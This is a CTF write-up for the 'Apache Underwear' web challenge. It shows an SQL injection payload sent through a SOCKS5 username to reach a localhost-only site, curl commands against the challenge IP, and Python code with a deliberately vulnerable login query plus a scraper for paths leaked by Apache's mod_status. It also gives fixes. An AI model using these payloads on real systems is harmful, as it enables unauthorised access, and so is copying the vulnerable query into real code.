# Teaser CONFidence CTF 2015: Apache Underwear

----------
## Challenge details
| Contest | Challenge | Category | Points |
|:---------------|:--------------|:----------|-------:|
| Teaser CONFidence CTF 2015 | Apache Underwear | Web | 400 |

**Description:**
>*Pwn [this server](http://134.213.136.187:8080/). Keep in mind, this is a web challenge :-O.*

----------
## Write-up

When connecting to the server, we are served the following page content:

>```html
>Youe IP (x.x.x.x) is too world wide ;
>```

This is a hint that the web application only serves clients that appear to come from the local network (or localhost), so we first have to go through the SOCKS server listening on port 9090 of the same host and request the site as 127.0.0.1 from there.

Let's give it a first try:

>```bash
>$ curl --socks5 134.213.136.187:9090 http://127.0.0.1/
>curl: (7) No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
>$ curl --socks5 ayy:<password>@134.213.136.187:9090 http://127.0.0.1/
>curl: (7) User was rejected by the SOCKS5 server (1 99).
>```

So we don't know the username and password for the SOCKS5 server. Since this is a web challenge, we made a wild guess that the SOCKS5 server might use some kind of DBMS backend for user management, and tried SQL injection through the username field. This works at the protocol level because SOCKS5 username/password authentication (RFC 1929) carries both fields length-prefixed, so the quotes, spaces and comment marker reach the server untouched; the password can be anything, since `/*` comments out whatever follows the injected username in the query:

>```bash
>$ curl --socks5 "' or 1=1/*:<password>@134.213.136.187:9090" "http://127.0.0.1:8080/"
>Nice One ! close ...
>```
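The exchange above, as an added example that is not part of the original write-up: the client side builds the RFC 1928 greeting, the RFC 1929 username/password sub-negotiation and the CONNECT request, and a hypothetical server side shows why the injected username authenticates. The proxy's real backend, schema and query are unknown; an in-memory sqlite table with one made-up row, a string-built lookup (`check_login_vulnerable`) and its parameterised counterpart (`check_login_safe`) stand in for them. Only the host, ports and payload are taken from the page.

```python
import socket
import sqlite3
import struct

SOCKS_VER = 0x05
METHOD_USERPASS = 0x02  # RFC 1928 method id for username/password auth (RFC 1929)
USERPASS_VER = 0x01     # RFC 1929 sub-negotiation version byte
CMD_CONNECT = ATYP_IPV4 = 0x01


def build_greeting() -> bytes:
    """RFC 1928 greeting: VER, NMETHODS, METHODS; we offer only username/password."""
    return bytes([SOCKS_VER, 1, METHOD_USERPASS])

def build_userpass(username: str, password: str) -> bytes:
    """RFC 1929 request: VER ULEN UNAME PLEN PASSWD. The fields are length-prefixed,
    so quotes and comment markers reach the server byte for byte."""
    u, p = username.encode(), password.encode()
    if len(u) > 255 or len(p) > 255:
        raise ValueError("RFC 1929 limits each field to 255 bytes")
    return bytes([USERPASS_VER, len(u)]) + u + bytes([len(p)]) + p

def parse_userpass(msg: bytes) -> tuple:
    """Server-side decode of the RFC 1929 request; rejects truncated input."""
    if len(msg) < 3 or msg[0] != USERPASS_VER:
        raise ValueError("not an RFC 1929 request")
    ulen = msg[1]
    uname = msg[2:2 + ulen]
    if len(uname) != ulen or len(msg) < 3 + ulen:
        raise ValueError("truncated username")
    plen = msg[2 + ulen]
    passwd = msg[3 + ulen:3 + ulen + plen]
    if len(passwd) != plen:
        raise ValueError("truncated password")
    return uname.decode(), passwd.decode()

def auth_reply(ok: bool) -> bytes:
    """RFC 1929 reply: VER, STATUS (0x00 = success, anything else = rejected)."""
    return bytes([USERPASS_VER, 0x00 if ok else 0x01])

def build_connect(host: str, port: int) -> bytes:
    """RFC 1928 CONNECT for an IPv4 target: VER CMD RSV ATYP DST.ADDR DST.PORT."""
    return (bytes([SOCKS_VER, CMD_CONNECT, 0x00, ATYP_IPV4])
            + socket.inet_aton(host) + struct.pack("!H", port))

# Hypothetical server side. The real proxy's backend and schema are unknown;
# an in-memory sqlite table with one made-up row stands in for them.
def make_user_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hunter2')")  # constructed sample row
    return db

def check_login_vulnerable(db, username: str, password: str) -> bool:
    """String-built query: the username "' or 1=1/*" closes the quote, makes the
    WHERE clause always true and comments out the password comparison."""
    query = f"SELECT 1 FROM users WHERE name='{username}' AND pass='{password}'"
    return db.execute(query).fetchone() is not None

def check_login_safe(db, username: str, password: str) -> bool:
    """Same lookup with bound parameters: the payload is just an unknown name."""
    query = "SELECT 1 FROM users WHERE name=? AND pass=?"
    return db.execute(query, (username, password)).fetchone() is not None

def server_handle_auth(db, msg: bytes, check) -> bytes:
    """What the proxy does with the sub-negotiation request: decode, look up, reply."""
    uname, passwd = parse_userpass(msg)
    return auth_reply(check(db, uname, passwd))

def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf

def socks5_http_get(proxy, username, password, target, path="/") -> bytes:
    """Real client exchange (needs network): greeting, user/pass auth, CONNECT,
    then a plain HTTP/1.0 GET through the tunnel, as curl --socks5 does."""
    s = socket.create_connection(proxy, timeout=10)
    s.sendall(build_greeting())
    if recv_exact(s, 2) != bytes([SOCKS_VER, METHOD_USERPASS]):
        raise RuntimeError("proxy did not select username/password auth")
    s.sendall(build_userpass(username, password))
    if recv_exact(s, 2) != auth_reply(True):
        raise RuntimeError("authentication rejected")
    s.sendall(build_connect(*target))
    rep = recv_exact(s, 10)  # VER REP RSV ATYP BND.ADDR(4) BND.PORT(2) for IPv4
    if rep[1] != 0x00:
        raise RuntimeError(f"CONNECT failed, REP={rep[1]:#x}")
    s.sendall(f"GET {path} HTTP/1.0\r\nHost: {target[0]}\r\n\r\n".encode())
    body = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        body += chunk
    s.close()
    return body
```

Against the live challenge the call would have been `socks5_http_get(("134.213.136.187", 9090), "' or 1=1/*", "x", ("127.0.0.1", 8080), "/server-status")`; the password argument is arbitrary because the comment marker removes it from the string-built query. The same payload fed to `check_login_safe` is compared as a literal name and is rejected, which is the whole fix: bind parameters, never splice credentials into SQL.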

OK, so that worked: the proxy accepts the injected username and the web application on port 8080 now sees us as a local client. After some messing around and trying various pages we gave Apache's [mod_status page](http://httpd.apache.org/docs/2.2/mod/mod_status.html) a try, since it discloses the request each worker is handling (or last handled) and is commonly restricted to localhost, which we now are:

>```bash
>$ curl --socks5 "' or 1=1/*:<password>@134.213.136.187:9090" "http://127.0.0.1:8080/server-status"
>
><html><head>
><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
><title>Apache Status</title>
></head><body>
><h1>Apache Server Status for 127.0.0.1</h1>
>(...)
><table border="0"><tbody><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
></th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
>
><tr><td>0-0</td><td>2989</td><td>0/2/2</td><td>_
></td><td>0.01</td><td>549</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
></td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /omg-omg-s3cr3t-file.txt HTTP/1.0</td></tr>
>
><tr><td>1-0</td><td>2990</td><td>0/1/1</td><td>W
></td><td>0.01</td><td>0</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
></td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /server-status HTTP/1.1</td></tr>
>(...)
><address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
>
></body></html>
>```

The following immediately stands out:

>*GET /omg-omg-s3cr3t-file.txt*

That is not one of our requests. The worker showing it is in state `_` (waiting for connection) with `SS` = 549, so mod_status is displaying the last request that slot served, one made from 127.0.0.1 about nine minutes earlier; idle slots keep their last request line, which is what makes an exposed status page such a good source of hidden paths. (The footer also tells us that Apache itself listens on port 80 behind whatever answers on 8080.)

Let's try that one:

>```bash
>$ curl --socks5 "' or 1=1/*:<password>@134.213.136.187:9090" "http://127.0.0.1:8080/omg-omg-s3cr3t-file.txt"
>DrgnS{S0xySqliAndAp4ch3}
>```
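Reading the scoreboard by eye is fine for one host; as an added example that is not part of the original write-up, the following pulls the per-worker rows out of a mod_status page and lists every path another worker has served, together with the worker state and the age of the slot. The sample HTML is constructed here in the shape of the excerpt above (Apache 2.2 output trimmed to the table); the state legend is the one the mod_status page prints.

```python
from html.parser import HTMLParser

# Constructed sample in the shape of the mod_status scoreboard excerpt above.
SAMPLE_STATUS = """<html><body><h1>Apache Server Status for 127.0.0.1</h1>
<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td>0-0</td><td>2989</td><td>0/2/2</td><td>_
</td><td>0.01</td><td>549</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
</td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /omg-omg-s3cr3t-file.txt HTTP/1.0</td></tr>
<tr><td>1-0</td><td>2990</td><td>0/1/1</td><td>W
</td><td>0.01</td><td>0</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
</td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /server-status HTTP/1.1</td></tr>
</table></body></html>"""

# Worker states as mod_status prints them in the M column.
WORKER_STATE = {"_": "waiting for connection", "S": "starting up", "R": "reading request",
                "W": "sending reply", "K": "keepalive", "D": "DNS lookup", "C": "closing",
                "L": "logging", "G": "gracefully finishing", "I": "idle cleanup", ".": "open slot"}


class _TableRows(HTMLParser):
    """Collects every <tr> as a list of stripped cell strings."""
    def __init__(self):
        super().__init__()
        self.rows, self._row, self._cell = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag in ("td", "th") and self._row is not None:
            self._cell = []

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            self.rows.append(self._row)
            self._row = None


def extract_requests(html: str) -> list:
    """Return one dict per scoreboard row, keyed by the column headers (Srv, PID, M, SS, ...)."""
    p = _TableRows()
    p.feed(html)
    p.close()
    header, records = None, []
    for row in p.rows:
        if "Request" in row and "Client" in row:   # the scoreboard header row
            header = row
        elif header and len(row) == len(header):
            records.append(dict(zip(header, row)))
    return records


def leaked_paths(records: list, ignore=("/server-status",)) -> list:
    """Paths served by workers other than ours, each with the worker state and the
    slot age in seconds (SS). Idle slots (M == '_') still show their last request,
    so a stale entry is a request somebody else made SS seconds ago."""
    found = {}
    for rec in records:
        parts = rec["Request"].split()
        if len(parts) != 3:            # open slots have an empty Request cell
            continue
        path = parts[1].split("?")[0]
        if path in ignore:
            continue
        found.setdefault(path, (WORKER_STATE.get(rec["M"], rec["M"]), int(rec["SS"])))
    return sorted(found.items())
```

On the sample this yields `/omg-omg-s3cr3t-file.txt` from a slot that is waiting for a connection and last worked 549 seconds ago. The usual hardening, `Require local` (or `Allow from 127.0.0.1` on 2.2) around `/server-status`, is exactly what the challenge had, and it did not help once an attacker could reach the loopback interface through the proxy; the status page needs to be disabled or put behind real authentication wherever anything on the host can be coaxed into making local requests.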

[Original write-up](https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/CONFIDENCE_TEASER/web/apacheunderwear).